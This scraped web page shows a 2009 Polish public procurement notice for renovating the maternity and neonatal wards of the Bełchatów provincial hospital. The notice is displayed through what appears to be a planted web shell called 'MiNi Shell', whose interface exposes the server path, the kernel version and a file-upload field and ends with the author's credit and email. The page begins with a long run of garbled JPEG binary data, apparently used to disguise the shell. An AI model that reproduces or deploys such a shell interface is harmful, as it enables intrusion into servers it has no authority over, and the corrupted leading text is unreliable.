JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/68933-N-2009.html

<p class="kh_header"><b>Bełchatów: Dostosowanie Oddziału ginekologiczno-położniczego oraz Oddziału neonatologicznego Szpitala Wojewódzkiego
 im. Jana Pawła II w Bełchatowie do obecnie obowiązujących wymagań prawnych
w zakresie Bloku porodowego na Oddziale ginekologiczno-położniczym</b><br>
<b>Numer ogłoszenia: 68933 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. Jana Pawła II , ul. Czapliniecka 123, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358236, faks (0-44) 63 58 208.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-belchatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostosowanie Oddziału ginekologiczno-położniczego oraz Oddziału neonatologicznego Szpitala Wojewódzkiego
 im. Jana Pawła II w Bełchatowie do obecnie obowiązujących wymagań prawnych
w zakresie Bloku porodowego na Oddziale ginekologiczno-położniczym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opis, wielkość i zakres:
        	 Planowane prace modernizacyjne obejmują:
             1) 	roboty budowlane   (CPV: 45.45.30.00-7)
 		(przebudowa pomieszczeń, wymiana podłóg, wymiana płytek ceramicznych; malowanie ścian; pokrycie ścian materiałem łatwozmywalnym w pomieszczeniach tego wymagających; kompleksowa modernizacja
                                węzłów sanitarnych)
 2)	modernizację instalacji wentylacji   (CPV: 45.33.12.10-1)
 3)	modernizację instalacji wentylacji i klimatyzacji   (CPV: 45.33.12.10-1)
4)	modernizację instalacji elektrycznej i teletechnicznej (CPV: 45.31.12.00-2)5)	modernizację instalacji centralnego ogrzewania   (CPV: 45.33.00.00-9)
6)	modernizację instalacji gazów medycznych   (CPV: 45.33.30.00-0)
7)	modernizację instalacji wodno-kanalizacyjnej   (CPV: 45.00.00.00-7)
2.  Szczegółowy zakres prac określają kosztorysy nakładcze - przedmiary robót (Załącznik nr 3 do SIWZ). Zasady
                    wykonania i odbioru robót określają Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (Załącznik
                    nr 4 do SIWZ). Wykonawca realizuje przedmiot zamówienia na podstawie dokumentacji projektowej (Załącznik nr 5
                    do SIWZ), przestrzegając zasad bezpieczeństwa i ochrony zdrowia (BIOZ). Załączniki nr 3 - 5 do SIWZ w wersji
                    elektronicznej.
3.  Jeżeli w opisie przedmiotu zamówienia znajdują się wskazania znaków towarowych, patentów lub pochodzenia, 
                    Wykonawca może zaoferować przedmioty równoważne. Wykazanie równoważności zaoferowanego przedmiotu
                    spoczywa na Wykonawcy.
4.   Obowiązki Wykonawcy, któremu zostanie udzielone zamówienie publiczne:
-  zapewnienie sprzętu spełniającego wymagania norm technicznych,
-  zabezpieczenie i oznakowanie prowadzonych robót,
-  współpraca ze służbami Zamawiającego,
-  zapewnienie kadry i nadzoru z wymaganymi uprawnieniami,
-  przestrzeganie przepisów p. poż. i bhp w czasie realizacji zamówienia,
-  prace budowlane muszą być wykonywane w warunkach funkcjonującego częściowo oddziału
    ginekologiczno-położniczego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.33.12.10-1, 45.31.12.00-2, 45.33.00.00-9, 45.33.30.00-0, 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Kwotę wadium ustala się w wysokości 15.000,00 PLN (słownie: piętnaście tysięcy złotych). Wadium wnoszone 
                           w pieniądzu musi wpłynąć na rachunek środków specjalnego przeznaczenia - wadia NORDEA BANK
                           POLSKA o/Bełchatów 83 1440 1257 0000 0000 01920715 lub w innej z przewidzianych w SIWZ form wraz 
                           z ofertą przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu: 

     O zamówienie  mogą  ubiegać  się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 oraz nie podlegają
     wykluczeniu z udziału w postępowaniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień
     publicznych /Dz. U. z 2007r. Nr 223, poz. 1655, z późn. zm./, a ponadto złożą oświadczenia zgodnie z Załącznikiem nr 1 
     do SIWZ - druk OFERTA i dokumenty wymienione w Rozdz. VI SIWZ.

Opis warunków udziału w postępowaniu oraz oceny ich spełnienia:
            1) Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega 
                  wykluczeniu na podstawie art. 24 ustawy - Pzp, zgodnie z informacjami zawartymi w dokumentach, o których
                  mowa w Rozdz. VI pkt 2 SIWZ;
            2)  Wykonawca posiada niezbędną wiedzę i doświadczenie (wykonane co najmniej 2 roboty budowlane), zgodnie 
                  z informacjami zawartymi w dokumentach, o których mowa w Rozdz. VI pkt 3 SIWZ;
            3)  Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zgodnie 
                  z informacjami zawartymi w dokumentach, o których mowa w Rozdz. VI pkt 4 SIWZ.
            Zamawiający dokonana oceny spełnienia warunków udziału w postępowaniu systemem: spełnia / nie spełnia (druk   
            ZP-17), na podstawie załączonych do oferty dokumentów lub oświadczeń, zgodnie z wymaganiami Zamawiającego 
            określonymi w niniejszej specyfikacji. Dokumenty wymagane od Wykonawców w celu potwierdzenia spełnienia 
            warunków udziału w postępowaniu, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. 
            w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te 
            dokumenty  mogą być składane - par. 1 ust. 1 pkt 2 i 3; par. 1 ust. 2 pkt 2; par. 1 ust. 3 pkt 2 i 3 (Dz. U. 
            z 2006r. Nr 87, poz. 605; Dz. U. z 2008r. Nr 188, poz. 1155, ze zmianami). Ponadto Wykonawca składa wraz z ofertą
            wymagane procedurą druki, formularze oraz inne dodatkowe dokumenty, wynikające z zapisów SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu

1. Wykonawca zgodnie z art. 44 ustawy - Pzp składa wraz z ofertą oświadczenie o spełnianiu warunków  
     udziału w postępowaniu (patrz: druk OFERTA). 
  
            2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności    
                 oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia  29 stycznia 2004r. - Prawo zamówień   
                 publicznych, wraz z ofertą należy złożyć następujące dokumenty:

   1) 	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli  odrębne  przepisy  wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej,
-  	wystawiony lub poświadczony pod względem aktualności przez uprawniony do wystawienia organ nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
           2) 	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu 
                       Ubezpieczeń Społecznych potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem 
                       podatków, opłat oraz składek ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał  
                       przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
                       w całości wykonania decyzji właściwego organu,
-	wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert;
     3)       oświadczenie  o niepodleganiu wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24
                 ustawy - Pzp (patrz: druk OFERTA). 

  3.  W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy 
                 i doświadczenia Zamawiający żąda następujących dokumentów:

	   1)          wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania
                                o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
                                z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, 
                                że roboty te zostały wykonane należycie  (np. opinie, referencje, protokoły odbioru);
                                -   wymagane co najmniej 2 zrealizowane roboty budowlane porównywalne z przedmiotem zamówienia
                                      (roboty budowlane i instalacyjne); łączna wartość zamówień przedstawionych w wykazie nie może być
                                      mniejsza niż 80% całkowitej wartości wynikającej ze złożonej oferty przetargowej;
                   2)        oświadczenie Wykonawcy o posiadaniu wiedzy i doświadczenia w zakresie instalacji gazów medycznych, 
                                a w przypadku braku takiej wiedzy i doświadczenia wymagane jest od Wykonawcy oświadczenie 
                                o zamiarze przekazania tej części zamówienia podwykonawcy, który dysponuje w tym zakresie
                                odpowiednimi uprawnieniami, wiedzą i doświadczeniem.

          4. 	   W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji
                 ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający żąda następujących dokumentów:

                   1)      informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada
                        rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową 
                        wykonawcy na kwotę nie mniejszą niż całkowita wartość wynikająca ze złożonej oferty przetargowej,
                                  -     wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
                 2)	  polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony 
                      od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę co najmniej 1.000.000 PLN;
          
          5.    Oferta, załączniki i inne wymagane procedurą dokumenty:
  
                   1)            druk OFERTA /wg załączonego wzoru druku - Załącznik nr 1 do SIWZ/;
                   2)        kosztorysy ofertowe odpowiadające przedmiotowi zamówienia, zgodnie z zakresem robót określonym 
                                  w kosztorysach nakładczych / przedmiarach robót, stanowiących Załącznik nr 3 do SIWZ/;
                   3)            potwierdzenie wniesienia wadium w formie przewidzianej w SIWZ; 
   4)      pełnomocnictwo(-a) do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo  
                                  reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego -  
                                  udzielone osobom nie wymienionym w dokumencie, o którym mowa w Rozdziale VI pkt 2 ppkt 1), 
                                  a reprezentującym Wykonawcę, w szczególności poprzez podpisywanie / poświadczanie dokumentów  
                                  składających się na ofertę oraz innych dokumentów składanych w toku postępowania.

          6.   Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast
                   dokumentów, o których mowa:
      1)           W pkt 2 ppkt 1 i 2 składa dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,
                    potwierdzające, odpowiednio, że:
	                      a)  	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
    	 	 b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo
                                 że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych
                                płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
           7.  Dokument, o którym  mowa w pkt 6 ppkt 1) lit. a powinien być wystawiony nie wcześniej niż 6 miesięcy przed
                  upływem terminu składania ofert, natomiast dokumenty, o których mowa w pkt 6 ppkt 1) lit. b powinny być
                  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
           8.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, 
                  nie wydaje się dokumentów, o których mowa w pkt 6 zastępuje się je dokumentami zawierającymi oświadczenie
                  złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu
                  zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca 
                  ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-belchatow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie, 97-400 Bełchatów, ul. Czapliniecka 123 -  w Sekcji Zamówień Publicznych (pok. nr 92)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2009 godzina 11:00, miejsce: W siedzibie Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie, 97-400 Bełchatów, ul. Czapliniecka 123 -  w sekretariacie Z-cy Dyrektora ds. Ekonomicznych (pok. nr 18)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com